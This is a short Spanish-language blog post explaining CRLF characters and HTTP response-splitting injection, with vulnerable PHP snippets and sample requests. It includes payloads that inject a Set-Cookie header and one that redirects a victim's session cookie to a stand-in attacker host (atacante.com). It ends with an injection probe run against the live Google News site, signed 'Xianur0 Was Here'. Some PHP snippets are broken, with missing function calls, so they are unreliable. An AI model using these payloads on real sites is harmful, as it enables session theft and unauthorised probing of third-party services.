CRLF

Posted on 17:00 by Xianur0

CR: retorno de carro.
Carácter Hexadecimal: 0D.
Carácter Decimal: 13.


LF: Salto de Linea.
Carácter Hexadecimal: 0A.
Carácter Decimal: 10.

CRLF:

Combinación de códigos de control (CR y LF) por la cual se crea una nueva linea.

Explicación Técnica:

Esta combinacion de codigos de control pueden ser usados para crear una nueva linea en metodos computacionales.

Ejemplo:

Código:
<?php
('Location: '.$_GET['page']);
?>

Con ese codigo y la version PHP correcta podriamos crear un header adicional a base de este:

http://www.server.com/vulnerable.php?page=%0D%0ASet-Cookie: isadmin=yes

Con esto la respuesta HTTP seria algo como esto:

Código:
HTTP/1.1 302 Found
Location:
Set-Cookie: isadmin=yes

También podríamos usarlo para robar cookies:

Código:
<?php
include('sessid.php');
$domain = $_REQUEST['uri'];
$id=
header('Set-Cookie: domain='.$domain.'; SESSID='.$id);
?>

Código:
GET http://www.server.com/vulnerable.php?exploit=%0D%0ALocation: http://www.atacante.com/cookies.php?cookie= HTTP/1.1
Host: www.server.com



y la respuesta seria:

Código:
HTTP/1.1 302 Found
Set-Cookie: domain=
Location: http://www.atacante.com/cookies.php?cookie=SESSID=datos

bueno esos son solo ejemplos de esta clase de ataques, ahora vamos a los ejemplos y ataquemos a google news:

Código:
http://news.google.com.mx/news?xianur0%5B%0D%0AXianur0%15Was%10%10%15Here%15%43%4F%44%45%0D%0A%15%48%45%58%5D=%0D%0A

Y en el código fuente podremos encontrar:

Código:
<input type=hidden name="xianur0[
Xianur0 Was Here CODE
HEX]" value="

como verán hasta los %10 los interpreto Sonrisa.. aparentemente nada mas están filtradas las dobles comillas y los > y < (por el htmlentities que si valora el revisar caracteres hexadecimales).

Extencion de Contenido:

IMAP/SMTP Injection (Gracias a Inyexion por el link)

0 comentarios: